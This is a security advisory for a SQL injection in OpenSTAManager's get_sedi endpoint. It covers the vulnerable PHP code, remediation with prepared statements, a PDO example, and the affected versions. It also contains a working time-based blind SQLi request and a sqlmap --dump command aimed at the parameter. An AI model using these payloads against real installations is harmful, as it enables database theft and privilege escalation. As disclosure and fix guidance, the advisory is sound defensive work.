GHSA-w995-ff8h-rppg

Source
https://github.com/advisories/GHSA-w995-ff8h-rppg
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-w995-ff8h-rppg/GHSA-w995-ff8h-rppg.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-w995-ff8h-rppg
Aliases
Published
2026-02-03T18:44:17Z
Modified
2026-02-22T23:25:58.641440Z
Severity
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)
Details

Summary

A SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access.

Proof of Concept

Vulnerable Code

File: modules/anagrafiche/ajax/complete.php:28

case 'get_sedi':
    $idanagrafica = get('idanagrafica');   // request-controlled value, used without validation
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione
          FROM an_sedi
          WHERE idanagrafica='".$idanagrafica."' ...";   // spliced into the SQL text inside single quotes
    $rs = $dbo->fetchArray($q);   // sink: the assembled string is executed as-is

Data Flow

  1. Source: $_GET['idanagrafica'] → get('idanagrafica')
  2. Vulnerable: the user-supplied value is concatenated directly into the SQL string inside single quotes, so a quote in the value ends the literal and the remainder is parsed as SQL
  3. Sink: $dbo->fetchArray($q) executes the resulting query

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>


SQLMap Exploitation:

sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12


Impact

  • Data Exfiltration: Complete database extraction including user credentials, customer data, financial records
  • Privilege Escalation: Modification of zz_users table to gain admin access
  • Data Integrity: Unauthorized modification or deletion of records
  • Potential RCE: Via SELECT ... INTO OUTFILE if file permissions allow

Affected Versions

  • OpenSTAManager: Verified in latest version (as of December 2025)
  • All versions using this endpoint are likely affected

Remediation

Replace direct concatenation with prepared statements:

Before:

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

After:

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";   // prepare() returns the value escaped and quoted, so no manual quotes around it
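The two shapes from the remediation side by side, as an added example that is not OpenSTAManager's code: it uses a PDO prepared statement with a bound parameter (rather than the project's prepare() escaping helper), runs against a constructed in-memory SQLite copy of the an_sedi columns the advisory shows, and substitutes SQLite's || for MySQL's CONCAT_WS.

```php
<?php
// Added example (not OpenSTAManager's code): the get_sedi lookup in its
// concatenated shape beside a bound-parameter version, run against a
// constructed in-memory SQLite copy of the an_sedi columns the advisory shows.
// SQLite has no CONCAT_WS, so '||' stands in for it here.

function expect(bool $cond, string $msg): void {
    if (!$cond) { throw new RuntimeException("check failed: $msg"); }
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE an_sedi (id INTEGER PRIMARY KEY, idanagrafica INTEGER, nomesede TEXT, citta TEXT)');
$db->exec("INSERT INTO an_sedi VALUES (1, 1, 'Sede legale', 'Milano'),
           (2, 1, 'Magazzino', 'Torino'), (3, 2, 'Sede', 'Roma')");

// Vulnerable shape from the advisory: the request value becomes part of the
// SQL text, so a quote inside it changes the statement the parser sees.
function getSediConcatenated(PDO $db, string $idanagrafica): array {
    $q = "SELECT id, (nomesede || ' - ' || citta) AS descrizione "
       . "FROM an_sedi WHERE idanagrafica='" . $idanagrafica . "'";
    return $db->query($q)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened shape: fixed SQL text, value sent separately as a bound parameter.
// Since idanagrafica is a numeric key, rejecting non-integers first is a
// cheap second layer; it is left out here so the binding itself is visible.
function getSediPrepared(PDO $db, string $idanagrafica): array {
    $stmt = $db->prepare('SELECT id, (nomesede || \' - \' || citta) AS descrizione '
                       . 'FROM an_sedi WHERE idanagrafica = :id');
    $stmt->execute([':id' => $idanagrafica]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Well-formed input: both return the two sites of anagrafica 1.
expect(count(getSediConcatenated($db, '1')) === 2, 'concatenated, id 1');
expect(count(getSediPrepared($db, '1')) === 2, 'prepared, id 1');

// Input carrying a single quote: the concatenated statement is no longer the
// one the developer wrote (here it fails to parse; on MySQL that same spot is
// where the advisory's SLEEP() payload lands). The prepared statement treats
// the whole value as data and simply matches nothing.
$tainted = "1'";
try {
    getSediConcatenated($db, $tainted);
    expect(false, 'concatenated query should not have parsed tainted input');
} catch (PDOException $e) {
    echo "concatenated query broke on tainted input: " . $e->getMessage() . "\n";
}
expect(getSediPrepared($db, $tainted) === [], 'prepared, tainted');
```

Requires the pdo_sqlite extension; the same two functions work unchanged against MySQL once CONCAT_WS is restored.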

Credit

Discovered by: Łukasz Rybak

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-03T18:44:17Z",
    "cwe_ids": [
        "CWE-89"
    ],
    "nvd_published_at": "2026-02-04T18:16:07Z",
    "severity": "HIGH"
}
References

Affected packages

Packagist / devcode-it/openstamanager

Package

Name
devcode-it/openstamanager
Purl
pkg:composer/devcode-it/openstamanager

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Last affected
2.9.8

Affected versions

2.*
2.3.0
v2.*
v2.4
v2.4.1
v2.4.2
v2.4.3
v2.4.4
v2.4.5
v2.4.6
v2.4.7
v2.4.8
v2.4.9
v2.4.10
v2.4.11
v2.4.12
v2.4.13
v2.4.14
v2.4.15
v2.4.16
v2.4.17
v2.4.17.1
v2.4.18
v2.4.19
v2.4.20
v2.4.21
v2.4.22
v2.4.23
v2.4.24
v2.4.25
v2.4.26
v2.4.27
v2.4.28
v2.4.29
v2.4.30
v2.4.31
v2.4.32
v2.4.33
v2.4.34
v2.4.35
v2.4.36
v2.4.37
v2.4.38
v2.4.39
v2.4.40
v2.4.41
v2.4.42
v2.4.43
v2.4.44
v2.4.45
v2.4.46
v2.4.47
v2.4.48
v2.4.49
v2.4.50
v2.4.51
v2.4.52
v2.4.53
v2.4.54
v2.5
v2.5.1-beta
v2.5.2-beta
v2.5.3
v2.5.4
v2.5.5
v2.5.6
v2.5.7
v2.6-beta
v2.6.1
v2.6.2
v2.7-beta
v2.7
v2.7.1
v2.7.2
v2.7.3
v2.8-beta
v2.8.1
v2.8.2
v2.8.3
v2.9-beta
v2.9
v2.9.1
v2.9.2
v2.9.3
v2.9.4
v2.9.5
v2.9.6
v2.9.7
v2.9.8

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-w995-ff8h-rppg/GHSA-w995-ff8h-rppg.json"